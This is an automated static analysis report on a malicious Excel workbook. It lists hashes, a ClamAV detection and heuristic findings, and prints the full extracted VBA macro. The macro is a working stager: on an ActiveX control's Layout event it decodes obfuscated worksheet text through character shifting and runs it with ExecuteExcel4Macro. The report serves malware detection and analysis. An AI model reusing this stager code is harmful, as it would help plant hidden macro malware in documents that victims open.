Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 aed09d91cb9d4f68…

MALICIOUS

Office (OOXML)

Size: 29.6 KB
Created: 2020-09-22 07:36:46 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-10-01
MD5: c7231688aa59fe4f96182e9998736b9a
SHA-1: 214fdb2bbe8cf28760b0322afca19b9ae3151d20
SHA-256: aed09d91cb9d4f68e7941bc3005fa0f01cfdc9d73b05b6676c04033123a2054c
Risk score: 240

Heuristics (4)

  • ClamAV: Xls.Malware.Mrhl-9774585-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Malware.Mrhl-9774585-0
  • VBA project inside OOXML [medium, OOXML_VBA; 2 related findings]
    Document contains a VBA project: VBA macros are present.
  • VBA ActiveX event runs worksheet-decoded XLM formulas [critical, OLE_VBA_ACTIVEX_XLM_CELL_STAGER]
    VBA code attached to an ActiveX/UserForm event reconstructs formula text from worksheet constants using Split/Replace/Mid or character shifting, then executes it through ExecuteExcel4Macro or Run. This is a high-confidence malware stager that hides XLM formula execution in sheet cells; it is not a document-parser CVE.
    Matched line in script: r = 65: ExecuteExcel4Macro (chatss)
  • OOXML VBA project hides Excel 4 macro execution bridge [high, OOXML_VBA_XLM_BRIDGE_RAW]
    Raw vbaProject.bin metadata references ExecuteExcel4Macro together with string-deobfuscation primitives, and the OOXML package exposes a button, drawing, or control surface that can invoke VBA. This is a macro/XLM stager indicator for projects whose source cannot be recovered cleanly; it is not a document-parser CVE attribution.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1368 bytes
SHA-256: 165c43708aa80c9c9112c0fd156565042506fba3024ce0bccffeb0adcf230f53
Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "guidamsd, 1, 0, MSForms, MultiPage"
Sub Guida1()
Application.WindowState = xlMinimized: ft = 1
A = tops: r = "j"
For Each uno In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): uno1 = uno1 & uno: Next
For g = A To Len(uno1) Step A
If (g Mod 2) Then wr = -1 Else wr = ft
ii = ii & Chr(Asc(Mid(uno1, g, ft)) + wr): Next
mb = Split(ii, r)
For Each y In mb
ry = A: picolas (Replace(y, "[", "J"))
Next
ems
End Sub
Function picolas(ByVal chatss As String) As String
r = 65: ExecuteExcel4Macro (chatss)
End Function
Private Sub guidamsd_Layout(ByVal Index As Long)
Guida1
End Sub
Function ems()
ems = tops - tops
ActiveWorkbook.Close ems
End Function
Function tops()
tops = 3
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 16896 bytes
SHA-256: 62d9eccb10905179c9603e4a40aac05e5b84661c0a00dac16f06a4507adc13b7
Detection: ClamAV: Xls.Malware.Mrhl-9774585-0
Obfuscation or payload: unlikely

Filename: emf_00.emf
Kind: ooxml-emf
Source: OOXML EMF part: xl/media/image1.emf
Size: 1408 bytes
SHA-256: 50abcb00719c61b78c5bbdc4312ee8a19e77b56a68945f68db89c6160e20eb9c